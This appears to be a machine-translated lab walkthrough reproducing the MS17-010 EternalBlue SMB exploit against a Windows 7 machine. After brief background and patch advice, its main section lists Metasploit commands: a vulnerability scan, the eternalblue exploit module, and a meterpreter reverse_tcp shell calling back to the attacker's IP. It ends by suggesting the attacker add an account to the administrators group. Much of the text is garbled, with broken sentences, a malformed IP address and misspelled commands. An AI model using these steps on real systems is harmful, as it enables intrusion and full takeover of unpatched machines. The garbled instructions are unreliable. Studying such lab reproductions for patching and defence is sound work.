Ms17-010 Eternal Blue vulnerability reproducibility
0x00 introduce vulnerabilities
Eternal Blue refers to the evening of April 14, 2017, "the eternal blue" using the Windows SMB system vulnerabilities can obtain the highest authority system
May 12, 2017, through the transformation of lawless elements "Eternal Blue" blackmail virus produced wannacry in multiple university campus network, in large enterprise networks and government agencies, private network trick, extortion pay high ransom to decrypt restore files.
0x01 vulnerability principle
Eternal Blue Formula One organization is a loophole in its attack exploits the framework for the SMB service vulnerability that could allow an attacker on the target system can execute arbitrary code.
0x02 Affects Version
Currently known affected versions of Windows include, but are not limited to:
WindowsNT,
Windows2000,
Windows XP,
Windows 2003,
Windows Vista,
Windows 7,
Windows 8,
Windows 2008,
Windows 2008 R2,
Windows Server 2012 SP0.
0x03 vulnerability repair
Microsoft was March 14, 2017 released MS17-010 patch fixes vulnerabilities "eternal blue" attacks, be sure to update the Windows system patches; Always Do not open attachments doc, rtf and other suffixes; intranet exist using the same account, please change the password as soon as possible the case of machine code, not on the computer Make sure the password change is completed, the network operation after the patch is installed, you can download the "eternal blue" tool bug fixes bug fixes
0x04 environmental vulnerability
Attack: Kali-Linux-2019.4-vmware -amd64 (IP: 192.168.139.153)
drone: Windows 7 X64 (IP: 192.168.139.140 )
0x05 reproducible vulnerability
[msfconsole] ----- start msf
[serarch ms17_010] ---- view the template library
[use auxiliary / scanner / smb / smb_ms17_010] - scan hosts to see if there are loopholes
[set rhosts 192.1683.139.140] - Sets scan host ip address
[exploit] - began to attack
[use exploit / windows / smb / ms17_010_eternalblue] - use to attack module
[show options] ---- viewing parameters need to be set
[set rhosts 192.168.139.140] - set the attacked host ip address
[set lhosts 192.168.139.153] - set the attacker ip address
[set threads 512] - set the attacker ip address
[set payload windows / x64 / meterpreter / reverse_tcp] - set the machine to bounce
[exploit] - begin to attack
[shell]
[whami]
[systeminfo]
[ipconfig]
Then you can add the user to modify the password Add to super administrators group